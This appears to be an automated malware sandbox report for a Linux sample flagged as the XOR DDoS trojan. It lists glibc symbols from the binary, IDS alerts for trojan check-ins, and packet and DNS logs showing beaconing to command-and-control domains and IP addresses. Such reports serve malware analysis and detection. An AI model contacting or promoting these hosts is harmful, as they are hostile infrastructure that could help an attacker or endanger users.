                                                                                                                                                                                    __init_misc.symtab0x806ac6078FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __init_sched_fifo_prio.symtab0x8053f8042FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __initstate.symtab0x8056370112FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __initstate_r.symtab0x8056780545FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __ioctl.symtab0x80690f033FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __is_smp.symtab0x80d61904OBJECT<unknown>DEFAULT22
                                                                                                                                                                                    __isatty.symtab0x808b6e034FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __isinf.symtab0x80964d064FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __isinfl.symtab0x809654085FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __isnan.symtab0x809651039FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __isnanl.symtab0x80965a069FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __kill.symtab0x805556031FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __lchown.symtab0x8068d8057FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __libc_alloca_cutoff.symtab0x806b01066FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __libc_argc.symtab0x80d63084OBJECT<unknown>DEFAULT22
                                                                                                                                                                                    __libc_argv.symtab0x80d630c4OBJECT<unknown>DEFAULT22
                                                                                                                                                                                    __libc_calloc.symtab0x80639e0842FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __libc_check_standard_fds.symtab0x8054cd0459FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __libc_cleanup_routine.symtab0x806b06027FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __libc_close.symtab0x8053ad080FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __libc_connect.symtab0x8053c3087FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __libc_csu_fini.symtab0x805512057FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __libc_csu_init.symtab0x8055160127FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __libc_disable_asynccancel.symtab0x806b08050FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __libc_dlclose.symtab0x80945c087FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __libc_dlopen_mode.symtab0x8094700226FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __libc_dlsym.symtab0x8094620108FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __libc_dlsym_private.symtab0x8094690108FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __libc_enable_asynccancel.symtab0x806b0c098FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __libc_enable_secure.symtab0x80cf1404OBJECT<unknown>DEFAULT18
                                                                                                                                                                                    __libc_enable_secure_decided.symtab0x80d63044OBJECT<unknown>DEFAULT22
                                                                                                                                                                                    __libc_errno.symtab0x144TLS<unknown>DEFAULT14
                                                                                                                                                                                    __libc_fatal.symtab0x8059d9042FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __libc_fcntl.symtab0x8053b70177FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __libc_fork.symtab0x8067810535FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __libc_free.symtab0x8065320410FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __libc_init_first.symtab0x806cba0133FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __libc_init_secure.symtab0x806cb4066FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __libc_longjmp.symtab0x805535084FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __libc_lseek.symtab0x8053d5033FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __libc_lseek64.symtab0x806ad50117FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __libc_mallinfo.symtab0x8060a60353FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __libc_malloc.symtab0x8063d30442FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __libc_malloc_initialized.symtab0x80cf9f84OBJECT<unknown>DEFAULT21
                                                                                                                                                                                    __libc_mallopt.symtab0x8061150356FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __libc_memalign.symtab0x8063ef0467FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __libc_message.symtab0x8059ad0691FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __libc_multiple_libcs.symtab0x80cfa4c4OBJECT<unknown>DEFAULT21
                                                                                                                                                                                    __libc_nanosleep.symtab0x80677b087FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __libc_open.symtab0x8053d8091FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __libc_pause.symtab0x8053de064FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __libc_pthread_init.symtab0x806b23045FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __libc_pvalloc.symtab0x80630c0469FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __libc_read.symtab0x8053a7091FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __libc_realloc.symtab0x80654c01085FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __libc_recvfrom.symtab0x8053c9087FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __libc_register_dl_open_hook.symtab0x80947f0125FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __libc_register_dlfcn_hook.symtab0x809e5b037FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __libc_resp.symtab0x04TLS<unknown>DEFAULT13
                                                                                                                                                                                    __libc_select.symtab0x8069170115FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __libc_send.symtab0x806ae4087FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __libc_sendto.symtab0x8053cf087FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __libc_setlocale_lock.symtab0x80d58a032OBJECT<unknown>DEFAULT22
                                                                                                                                                                                    __libc_setup_tls.symtab0x8054f00505FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __libc_sigaction.symtab0x8054730298FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __libc_siglongjmp.symtab0x805535084FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __libc_stack_end.symtab0x80cf13c4OBJECT<unknown>DEFAULT18
                                                                                                                                                                                    __libc_start_main.symtab0x80549b0763FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __libc_system.symtab0x8057a30104FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __libc_thread_freeres.symtab0x80b298033FUNC<unknown>DEFAULT5
                                                                                                                                                                                    __libc_tsd_CTYPE_B.symtab0x184TLS<unknown>DEFAULT14
                                                                                                                                                                                    __libc_tsd_CTYPE_TOLOWER.symtab0x204TLS<unknown>DEFAULT14
                                                                                                                                                                                    __libc_tsd_CTYPE_TOUPPER.symtab0x1c4TLS<unknown>DEFAULT14
                                                                                                                                                                                    __libc_tsd_LOCALE.symtab0x84TLS<unknown>DEFAULT13
                                                                                                                                                                                    __libc_tsd_MALLOC.symtab0x244TLS<unknown>DEFAULT14
                                                                                                                                                                                    __libc_valloc.symtab0x80632a0467FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __libc_waitpid.symtab0x8053e2091FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __libc_write.symtab0x8053a1091FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __libc_writev.symtab0x808b980270FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __libio_codecvt.symtab0x80c2e00120OBJECT<unknown>DEFAULT7
                                                                                                                                                                                    __libio_translit.symtab0x80c2e7820OBJECT<unknown>DEFAULT7
                                                                                                                                                                                    __lll_lock_wait.symtab0x805373048FUNC<unknown>HIDDEN3
                                                                                                                                                                                    __lll_lock_wait_private.symtab0x805370042FUNC<unknown>HIDDEN3
                                                                                                                                                                                    __lll_robust_lock_wait.symtab0x80538e081FUNC<unknown>HIDDEN3
                                                                                                                                                                                    __lll_robust_timedlock_wait.symtab0x8053940201FUNC<unknown>HIDDEN3
                                                                                                                                                                                    __lll_timedlock_wait.symtab0x8053760173FUNC<unknown>HIDDEN3
                                                                                                                                                                                    __lll_timedwait_tid.symtab0x8053870112FUNC<unknown>HIDDEN3
                                                                                                                                                                                    __lll_unlock_wake.symtab0x805384043FUNC<unknown>HIDDEN3
                                                                                                                                                                                    __lll_unlock_wake_private.symtab0x805381037FUNC<unknown>HIDDEN3
                                                                                                                                                                                    __llseek.symtab0x806ad50117FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __localtime_r.symtab0x8086e0034FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __longjmp.symtab0x80553b043FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __lseek.symtab0x8053d5033FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __lseek64.symtab0x806ad50117FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __make_stacks_executable.symtab0x8051210257FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __mallinfo.symtab0x8060a60353FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __malloc.symtab0x8063d30442FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __malloc_check_init.symtab0x8060000121FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __malloc_get_state.symtab0x8064180428FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __malloc_hook.symtab0x80cf9ec4OBJECT<unknown>DEFAULT21
                                                                                                                                                                                    __malloc_initialize_hook.symtab0x80d4b404OBJECT<unknown>DEFAULT22
                                                                                                                                                                                    __malloc_set_state.symtab0x8060dc0905FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __malloc_stats.symtab0x8060840529FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __malloc_trim.symtab0x8060bd0493FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __malloc_usable_size.symtab0x805f01052FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __mallopt.symtab0x8061150356FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __mbrlen.symtab0x808650055FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __mbrtowc.symtab0x8086540407FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __mbsnrtowcs.symtab0x8086ae0594FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __memalign.symtab0x8063ef0467FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __memalign_hook.symtab0x80cf9f44OBJECT<unknown>DEFAULT21
                                                                                                                                                                                    __memchr.symtab0x8066760411FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __mempcpy.symtab0x8066a2068FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __mkdir.symtab0x8068d6031FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __mktime_internal.symtab0x809f3002437FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __mmap.symtab0x8069da067FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __mmap64.symtab0x8069df088FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __mon_yday.symtab0x80c72c052OBJECT<unknown>DEFAULT7
                                                                                                                                                                                    __morecore.symtab0x80cf9e84OBJECT<unknown>DEFAULT21
                                                                                                                                                                                    __mpn_add_n.symtab0x80aa690144FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __mpn_addmul_1.symtab0x80aa72060FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __mpn_cmp.symtab0x8096b6092FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __mpn_construct_double.symtab0x80aa7a086FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __mpn_construct_float.symtab0x80aa76049FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __mpn_construct_long_double.symtab0x80aa80071FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __mpn_divrem.symtab0x8096bc01112FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __mpn_extract_double.symtab0x80988b0244FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __mpn_extract_long_double.symtab0x80989b0279FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __mpn_impn_mul_n.symtab0x80976701989FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __mpn_impn_mul_n_basecase.symtab0x8097570247FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __mpn_impn_sqr_n.symtab0x8097e401829FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __mpn_impn_sqr_n_basecase.symtab0x8097470250FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __mpn_lshift.symtab0x809702087FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __mpn_mul.symtab0x80970e0843FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __mpn_mul_1.symtab0x809743057FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __mpn_mul_n.symtab0x8098570620FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __mpn_rshift.symtab0x809708087FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __mpn_sub_n.symtab0x80987e0144FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __mpn_submul_1.symtab0x809887060FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __mprotect.symtab0x8069e7033FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __mremap.symtab0x806add045FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __munmap.symtab0x8069e5031FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __nanosleep.symtab0x80677b087FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __nanosleep_nocancel.symtab0x80677ba31FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __new_exitfn.symtab0x8056000274FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __new_exitfn_called.symtab0x80d62408OBJECT<unknown>DEFAULT22
                                                                                                                                                                                    __new_fclose.symtab0x8057df0439FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __new_fopen.symtab0x80582a034FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __new_getrlimit.symtab0x806903054FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __new_sem_init.symtab0x805332084FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __new_sem_post.symtab0x805342078FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __new_sem_wait.symtab0x8053380141FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __nptl_create_event.symtab0x80547005FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __nptl_deallocate_tsd.symtab0x8050980278FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __nptl_death_event.symtab0x80547105FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __nptl_initial_report_events.symtab0x80d20cc1OBJECT<unknown>DEFAULT22
                                                                                                                                                                                    __nptl_last_event.symtab0x80d20c04OBJECT<unknown>DEFAULT22
                                                                                                                                                                                    __nptl_nthreads.symtab0x80cf4f04OBJECT<unknown>DEFAULT21
                                                                                                                                                                                    __nptl_setxid.symtab0x8050e60941FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __nptl_threads_events.symtab0x80d20b88OBJECT<unknown>DEFAULT22
                                                                                                                                                                                    __offtime.symtab0x809f010746FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __open.symtab0x8053d8091FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __open_nocancel.symtab0x8053d8a33FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __opendir.symtab0x80672a0220FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __overflow.symtab0x805d81041FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __parse_one_specmb.symtab0x80834801320FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __pause_nocancel.symtab0x8053dea19FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __posix_memalign.symtab0x80640d0111FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __preinit_array_end.symtab0x80cf1200NOTYPE<unknown>HIDDEN14
                                                                                                                                                                                    __preinit_array_start.symtab0x80cf1200NOTYPE<unknown>HIDDEN14
                                                                                                                                                                                    __printf_arginfo_table.symtab0x80d63e04OBJECT<unknown>DEFAULT23
                                                                                                                                                                                    __printf_fp.symtab0x807f6209363FUNC<unknown>DEFAULT3
                                                                                                                                                                                    __printf_fphex.symtab0x8081b506104FUNC<unknown>DEFAULT3
                                                                                                                                                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                                                    192.168.2.23142.0.138.4143268802021336 10/26/23-20:30:47.799532TCP2021336ET TROJAN DDoS.XOR Checkin via HTTP4326880192.168.2.23142.0.138.41
                                                                                                                                                                                    192.168.2.23142.0.138.444698615252020381 10/26/23-20:31:08.890920TCP2020381ET TROJAN DDoS.XOR Checkin469861525192.168.2.23142.0.138.44
                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                    Oct 26, 2023 20:30:47.638590097 CEST4326880192.168.2.23142.0.138.41
                                                                                                                                                                                    Oct 26, 2023 20:30:47.649913073 CEST548261525192.168.2.2334.98.99.30
                                                                                                                                                                                    Oct 26, 2023 20:30:47.787046909 CEST43928443192.168.2.2391.189.91.42
                                                                                                                                                                                    Oct 26, 2023 20:30:47.798882008 CEST8043268142.0.138.41192.168.2.23
                                                                                                                                                                                    Oct 26, 2023 20:30:47.798933983 CEST4326880192.168.2.23142.0.138.41
                                                                                                                                                                                    Oct 26, 2023 20:30:47.799531937 CEST4326880192.168.2.23142.0.138.41
                                                                                                                                                                                    Oct 26, 2023 20:30:47.959801912 CEST8043268142.0.138.41192.168.2.23
                                                                                                                                                                                    Oct 26, 2023 20:30:47.961174011 CEST4326880192.168.2.23142.0.138.41
                                                                                                                                                                                    Oct 26, 2023 20:30:48.121442080 CEST8043268142.0.138.41192.168.2.23
                                                                                                                                                                                    Oct 26, 2023 20:30:48.650912046 CEST548261525192.168.2.2334.98.99.30
                                                                                                                                                                                    Oct 26, 2023 20:30:50.666712999 CEST548261525192.168.2.2334.98.99.30
                                                                                                                                                                                    Oct 26, 2023 20:30:52.972816944 CEST555661525192.168.2.23192.74.236.35
                                                                                                                                                                                    Oct 26, 2023 20:30:53.418457031 CEST42836443192.168.2.2391.189.91.43
                                                                                                                                                                                    Oct 26, 2023 20:30:53.994735003 CEST555661525192.168.2.23192.74.236.35
                                                                                                                                                                                    Oct 26, 2023 20:30:54.698065042 CEST4251680192.168.2.23109.202.202.202
                                                                                                                                                                                    Oct 26, 2023 20:30:56.009947062 CEST555661525192.168.2.23192.74.236.35
                                                                                                                                                                                    Oct 26, 2023 20:30:58.085453033 CEST398601525192.168.2.23142.4.106.74
                                                                                                                                                                                    Oct 26, 2023 20:30:59.113511086 CEST398601525192.168.2.23142.4.106.74
                                                                                                                                                                                    Oct 26, 2023 20:31:01.129153967 CEST398601525192.168.2.23142.4.106.74
                                                                                                                                                                                    Oct 26, 2023 20:31:03.195419073 CEST548341525192.168.2.2334.98.99.30
                                                                                                                                                                                    Oct 26, 2023 20:31:04.200782061 CEST548341525192.168.2.2334.98.99.30
                                                                                                                                                                                    Oct 26, 2023 20:31:06.216429949 CEST548341525192.168.2.2334.98.99.30
                                                                                                                                                                                    Oct 26, 2023 20:31:08.264247894 CEST43928443192.168.2.2391.189.91.42
                                                                                                                                                                                    Oct 26, 2023 20:31:08.506274939 CEST469861525192.168.2.23142.0.138.44
                                                                                                                                                                                    Oct 26, 2023 20:31:08.666691065 CEST152546986142.0.138.44192.168.2.23
                                                                                                                                                                                    Oct 26, 2023 20:31:08.666851997 CEST469861525192.168.2.23142.0.138.44
                                                                                                                                                                                    Oct 26, 2023 20:31:08.675585032 CEST469861525192.168.2.23142.0.138.44
                                                                                                                                                                                    Oct 26, 2023 20:31:08.890678883 CEST152546986142.0.138.44192.168.2.23
                                                                                                                                                                                    Oct 26, 2023 20:31:08.890919924 CEST469861525192.168.2.23142.0.138.44
                                                                                                                                                                                    Oct 26, 2023 20:31:09.051031113 CEST152546986142.0.138.44192.168.2.23
                                                                                                                                                                                    Oct 26, 2023 20:31:09.051240921 CEST469861525192.168.2.23142.0.138.44
                                                                                                                                                                                    Oct 26, 2023 20:31:19.220221996 CEST152546986142.0.138.44192.168.2.23
                                                                                                                                                                                    Oct 26, 2023 20:31:19.220467091 CEST469861525192.168.2.23142.0.138.44
                                                                                                                                                                                    Oct 26, 2023 20:31:20.550487041 CEST42836443192.168.2.2391.189.91.43
                                                                                                                                                                                    Oct 26, 2023 20:31:24.645837069 CEST4251680192.168.2.23109.202.202.202
                                                                                                                                                                                    Oct 26, 2023 20:31:28.598973036 CEST152546986142.0.138.44192.168.2.23
                                                                                                                                                                                    Oct 26, 2023 20:31:28.599102974 CEST469861525192.168.2.23142.0.138.44
                                                                                                                                                                                    Oct 26, 2023 20:31:38.769171953 CEST152546986142.0.138.44192.168.2.23
                                                                                                                                                                                    Oct 26, 2023 20:31:38.769468069 CEST469861525192.168.2.23142.0.138.44
                                                                                                                                                                                    Oct 26, 2023 20:31:48.942140102 CEST152546986142.0.138.44192.168.2.23
                                                                                                                                                                                    Oct 26, 2023 20:31:48.942369938 CEST469861525192.168.2.23142.0.138.44
                                                                                                                                                                                    Oct 26, 2023 20:31:49.218413115 CEST43928443192.168.2.2391.189.91.42
                                                                                                                                                                                    Oct 26, 2023 20:31:59.116544962 CEST152546986142.0.138.44192.168.2.23
                                                                                                                                                                                    Oct 26, 2023 20:31:59.116610050 CEST469861525192.168.2.23142.0.138.44
                                                                                                                                                                                    Oct 26, 2023 20:32:04.009221077 CEST152546986142.0.138.44192.168.2.23
                                                                                                                                                                                    Oct 26, 2023 20:32:04.009299994 CEST469861525192.168.2.23142.0.138.44
                                                                                                                                                                                    Oct 26, 2023 20:32:14.183406115 CEST152546986142.0.138.44192.168.2.23
                                                                                                                                                                                    Oct 26, 2023 20:32:14.183491945 CEST469861525192.168.2.23142.0.138.44
                                                                                                                                                                                    Oct 26, 2023 20:32:24.352386951 CEST152546986142.0.138.44192.168.2.23
                                                                                                                                                                                    Oct 26, 2023 20:32:24.352648973 CEST469861525192.168.2.23142.0.138.44
                                                                                                                                                                                    Oct 26, 2023 20:32:34.526380062 CEST152546986142.0.138.44192.168.2.23
                                                                                                                                                                                    Oct 26, 2023 20:32:34.526607990 CEST469861525192.168.2.23142.0.138.44
                                                                                                                                                                                    Oct 26, 2023 20:32:39.450508118 CEST152546986142.0.138.44192.168.2.23
                                                                                                                                                                                    Oct 26, 2023 20:32:39.450839043 CEST469861525192.168.2.23142.0.138.44
                                                                                                                                                                                    Oct 26, 2023 20:32:49.620702028 CEST152546986142.0.138.44192.168.2.23
                                                                                                                                                                                    Oct 26, 2023 20:32:49.620836973 CEST469861525192.168.2.23142.0.138.44
                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                    Oct 26, 2023 20:30:47.533155918 CEST4970553192.168.2.238.8.8.8
                                                                                                                                                                                    Oct 26, 2023 20:30:47.544496059 CEST4901453192.168.2.238.8.8.8
                                                                                                                                                                                    Oct 26, 2023 20:30:47.638472080 CEST53497058.8.8.8192.168.2.23
                                                                                                                                                                                    Oct 26, 2023 20:30:47.649831057 CEST53490148.8.8.8192.168.2.23
                                                                                                                                                                                    Oct 26, 2023 20:30:52.650373936 CEST3690253192.168.2.238.8.8.8
                                                                                                                                                                                    Oct 26, 2023 20:30:52.759440899 CEST53369028.8.8.8192.168.2.23
                                                                                                                                                                                    Oct 26, 2023 20:30:52.759553909 CEST3811153192.168.2.238.8.4.4
                                                                                                                                                                                    Oct 26, 2023 20:30:52.867166042 CEST53381118.8.4.4192.168.2.23
                                                                                                                                                                                    Oct 26, 2023 20:30:52.867321968 CEST4157153192.168.2.238.8.8.8
                                                                                                                                                                                    Oct 26, 2023 20:30:52.972693920 CEST53415718.8.8.8192.168.2.23
                                                                                                                                                                                    Oct 26, 2023 20:30:57.977235079 CEST5438453192.168.2.238.8.8.8
                                                                                                                                                                                    Oct 26, 2023 20:30:58.085293055 CEST53543848.8.8.8192.168.2.23
                                                                                                                                                                                    Oct 26, 2023 20:31:03.090017080 CEST5789353192.168.2.238.8.8.8
                                                                                                                                                                                    Oct 26, 2023 20:31:03.195225000 CEST53578938.8.8.8192.168.2.23
                                                                                                                                                                                    Oct 26, 2023 20:31:08.199086905 CEST3321853192.168.2.238.8.8.8
                                                                                                                                                                                    Oct 26, 2023 20:31:08.297816992 CEST53332188.8.8.8192.168.2.23
                                                                                                                                                                                    Oct 26, 2023 20:31:08.298120975 CEST5943953192.168.2.238.8.4.4
                                                                                                                                                                                    Oct 26, 2023 20:31:08.403337002 CEST53594398.8.4.4192.168.2.23
                                                                                                                                                                                    Oct 26, 2023 20:31:08.403851032 CEST3996053192.168.2.238.8.8.8
                                                                                                                                                                                    Oct 26, 2023 20:31:08.505925894 CEST53399608.8.8.8192.168.2.23
                                                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                    Oct 26, 2023 20:30:47.533155918 CEST192.168.2.238.8.8.80x78fdStandard query (0)www1.gggatat456.comA (IP address)IN (0x0001)false
                                                                                                                                                                                    Oct 26, 2023 20:30:47.544496059 CEST192.168.2.238.8.8.80xe39dStandard query (0)p5.lpjulidny7.comA (IP address)IN (0x0001)false
                                                                                                                                                                                    Oct 26, 2023 20:30:52.650373936 CEST192.168.2.238.8.8.80x410bStandard query (0)p5.dddgata789.comA (IP address)IN (0x0001)false
                                                                                                                                                                                    Oct 26, 2023 20:30:52.759553909 CEST192.168.2.238.8.4.40xe256Standard query (0)p5.dddgata789.comA (IP address)IN (0x0001)false
                                                                                                                                                                                    Oct 26, 2023 20:30:52.867321968 CEST192.168.2.238.8.8.80xbb43Standard query (0)ppp.xxxatat456.comA (IP address)IN (0x0001)false
                                                                                                                                                                                    Oct 26, 2023 20:30:57.977235079 CEST192.168.2.238.8.8.80x18b2Standard query (0)ppp.gggatat456.comA (IP address)IN (0x0001)false
                                                                                                                                                                                    Oct 26, 2023 20:31:03.090017080 CEST192.168.2.238.8.8.80x3214Standard query (0)p5.lpjulidny7.comA (IP address)IN (0x0001)false
                                                                                                                                                                                    Oct 26, 2023 20:31:08.199086905 CEST192.168.2.238.8.8.80x90eaStandard query (0)p5.dddgata789.comA (IP address)IN (0x0001)false
                                                                                                                                                                                    Oct 26, 2023 20:31:08.298120975 CEST192.168.2.238.8.4.40x11b1Standard query (0)p5.dddgata789.comA (IP address)IN (0x0001)false
                                                                                                                                                                                    Oct 26, 2023 20:31:08.403851032 CEST192.168.2.238.8.8.80x829cStandard query (0)ppp.xxxatat456.comA (IP address)IN (0x0001)false
                                                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                    Oct 26, 2023 20:30:47.638472080 CEST8.8.8.8192.168.2.230x78fdNo error (0)www1.gggatat456.com142.0.138.41A (IP address)IN (0x0001)false
                                                                                                                                                                                    Oct 26, 2023 20:30:47.649831057 CEST8.8.8.8192.168.2.230xe39dNo error (0)p5.lpjulidny7.com34.98.99.30A (IP address)IN (0x0001)false
                                                                                                                                                                                    Oct 26, 2023 20:30:52.759440899 CEST8.8.8.8192.168.2.230x410bName error (3)p5.dddgata789.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                    Oct 26, 2023 20:30:52.867166042 CEST8.8.4.4192.168.2.230xe256Name error (3)p5.dddgata789.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                    Oct 26, 2023 20:30:52.972693920 CEST8.8.8.8192.168.2.230xbb43No error (0)ppp.xxxatat456.com192.74.236.35A (IP address)IN (0x0001)false
                                                                                                                                                                                    Oct 26, 2023 20:30:52.972693920 CEST8.8.8.8192.168.2.230xbb43No error (0)ppp.xxxatat456.com142.4.106.75A (IP address)IN (0x0001)false
                                                                                                                                                                                    Oct 26, 2023 20:30:52.972693920 CEST8.8.8.8192.168.2.230xbb43No error (0)ppp.xxxatat456.com142.4.106.73A (IP address)IN (0x0001)false
                                                                                                                                                                                    Oct 26, 2023 20:30:52.972693920 CEST8.8.8.8192.168.2.230xbb43No error (0)ppp.xxxatat456.com142.0.138.44A (IP address)IN (0x0001)false
                                                                                                                                                                                    Oct 26, 2023 20:30:52.972693920 CEST8.8.8.8192.168.2.230xbb43No error (0)ppp.xxxatat456.com142.0.138.42A (IP address)IN (0x0001)false
                                                                                                                                                                                    Oct 26, 2023 20:30:52.972693920 CEST8.8.8.8192.168.2.230xbb43No error (0)ppp.xxxatat456.com192.74.236.33A (IP address)IN (0x0001)false
                                                                                                                                                                                    Oct 26, 2023 20:30:58.085293055 CEST8.8.8.8192.168.2.230x18b2No error (0)ppp.gggatat456.com142.4.106.74A (IP address)IN (0x0001)false
                                                                                                                                                                                    Oct 26, 2023 20:30:58.085293055 CEST8.8.8.8192.168.2.230x18b2No error (0)ppp.gggatat456.com192.74.236.36A (IP address)IN (0x0001)false
                                                                                                                                                                                    Oct 26, 2023 20:30:58.085293055 CEST8.8.8.8192.168.2.230x18b2No error (0)ppp.gggatat456.com142.0.138.43A (IP address)IN (0x0001)false
                                                                                                                                                                                    Oct 26, 2023 20:30:58.085293055 CEST8.8.8.8192.168.2.230x18b2No error (0)ppp.gggatat456.com142.4.106.76A (IP address)IN (0x0001)false
                                                                                                                                                                                    Oct 26, 2023 20:30:58.085293055 CEST8.8.8.8192.168.2.230x18b2No error (0)ppp.gggatat456.com142.0.138.41A (IP address)IN (0x0001)false
                                                                                                                                                                                    Oct 26, 2023 20:30:58.085293055 CEST8.8.8.8192.168.2.230x18b2No error (0)ppp.gggatat456.com192.74.236.34A (IP address)IN (0x0001)false
